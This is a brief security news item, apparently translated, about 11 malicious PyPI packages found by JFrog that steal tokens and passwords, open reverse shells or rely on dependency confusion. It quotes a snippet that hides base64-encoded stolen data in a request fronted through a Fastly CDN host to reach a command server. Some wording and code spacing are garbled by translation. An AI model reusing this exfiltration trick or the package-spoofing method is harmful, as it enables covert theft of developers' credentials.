GITHUBGEMS: Researchers have discovered malicious Python packages in PyPI 11

Researchers have discovered malicious Python packages in PyPI 11 that can steal access tokens, passwords and create backdoors

Security experts at JFrog report finding 11 malicious P ython packages in the Python Package Index (PyPI) repository, apparently designed to steal access tokens to platforms such as Discord, in addition to hijacking passwords and deploying dependency confusion attacks.

The list of malicious packages detected during the study is presented below:

▫️ importantpackage / important-package
▫️ pptest
▫️ ipboards
▫️ owlmoon
▫️ DiscordSafety
▫️ trrfab
▫️ 10Cent10 / 10Cent11
▫️ yandex-yt
▫️ yiffparty

Among these packages, experts point out that “importantpackage”, “10Cent10” and “10Cent11” seem to create an inverse layer on the compromised machine. In addition, “importantpackage” abuses TLS CDN termination to steal data in addition to using Fastly CDN to hide malicious communication with the C&C server.

url = “https://pypi.python.org” + “/ images” + “?” + “Guid =” + b64_payload
r = request.Request (url, headers = {‘Host’: “psec.forward.io.global.prod.fastly.net”})


Researchers note that this code causes an HTTPS request to be sent to pypi.python.org, which is then redirected by the CDN as an HTTP request to the C2 server psec.forward.io.global.prod.fastly.net.

The dependency confusion technique involves downloading infected components that have the same name as legitimate internal private packages but with a higher version and are uploaded to the public repositories. This method is really good for tricking package managers into downloading and installing malicious modules.

In conclusion, the researchers noted that while this attack is similar to other hacking methods, it gives attackers the ability to act stealthily and can also serve as a prelude to subsequent attacks.

Categories: